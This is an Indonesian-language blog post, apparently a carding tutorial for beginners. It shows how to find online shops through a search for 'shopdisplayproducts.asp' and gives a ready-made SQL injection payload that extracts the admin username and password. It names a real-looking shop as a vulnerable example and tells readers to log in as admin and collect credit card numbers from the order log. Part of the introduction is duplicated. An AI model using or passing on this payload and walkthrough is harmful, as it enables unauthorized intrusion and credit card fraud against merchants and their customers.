Bagi master2 Carding lewati ja tutorial ni,..
mngkin udh basi...
ini gw post buat yg pemula seperti saya..
ehhehehehe.
Lw gtu ane mulai...
...
Langkah yang pertama ialah mencari target web yang mau kita test vuln apa enggaxnya, kita cari di cari di google dengan keyword :
mngkin udh basi...
ini gw post buat yg pemula seperti saya..
ehhehehehe.
Lw gtu ane mulai...
...
Langkah yang pertama ialah mencari target web yang mau kita test vuln apa enggaxnya, kita cari di cari di google dengan keyword :
/shop/shopdisplayproducts.asp atau shopdisplayproducts.asp
Kalo dah dapet web yang dah mau dijadiin target terus kita coba pake script ini –> ?cat=´%
20and%201=convert(int,(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%
20tbluser))–sp_password
Misalnya kita dapet target
http://www.masih-vul...m/shopdisplaypr ... weleh=uhui
Terus kita masukin deh script tadi dibelakang shopdisplayproducts.asp jadinya kayak gini deh :
http://www.masih-vul...roducts.asp?cat
´%20and%201=convert(int,(select%20top%
201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))–sp_password
Der apa yang terjadi …? Kok gx ada yang terjadi malahan keluar
The page cannot be found
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
Kalo ghitu artinya tuh web gx bisa kita kasih script gituan, coba cari yang laen deh. Kalo webnya masih vuln entar keluar username sama password adminnya, kalo udah dapet kita tinggal login pake username and password hasil temuan kita tadi. Sebagai contoh web yang masih vuln adalah :
http://www.ilovesport.com.au/
jadinya :
http://www.ilovespor...m.au/shop/shopd ... s.asp?cat=
´%20and%201=convert(int,
(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))–sp_password
Dan yang keluar malahan username sama password adminnya, abis itu kita tinggal login pake username ama password tersebut di
http://www.ilovespor.../shop/admin.asp
abis itu masuk ke order lognya terus cari deh cartu creditnya disana.
selamat mencoba...!!
Kami adalah sekumpulan individu yang ingin bebas memacu kinerja otak dan adrenalin di tubuh Kami;
kami ingin bebas melakukan hal-hal menarik yang sulit terpecahkan bahkan mustahil sekalipun;
0 komentar:
Posting Komentar
Kalau Comment Jangan Junk Ya